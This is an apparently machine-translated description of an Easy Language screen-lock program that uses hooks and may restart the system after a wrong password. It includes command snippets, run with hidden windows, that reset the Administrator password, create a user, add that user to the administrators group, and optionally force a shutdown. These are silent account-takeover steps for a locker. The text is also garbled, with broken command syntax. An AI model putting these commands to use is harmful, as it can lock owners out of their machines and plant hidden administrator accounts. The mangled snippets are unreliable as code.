The computer lock software Easy Language Source Code is an Easy Language computer lock source code that uses hooks to realize the lock screen function. This lock screen is a bit special. If your password is wrong, it may cause the system to restart and other operations. Please see the description of the software above for details. The computer runs Run("net user Administrator password", false, hides the window) Run("net user username password/add", false, hides the window) Runs ("net user administrators Same as above username/add", false, hides the window ) This code is OK. Username - account name, password - the password you want to set. Same as above. Username - change the username in the second sentence of the code and so on. If you want to shut down, add: Close system (shutdown, true)
Expand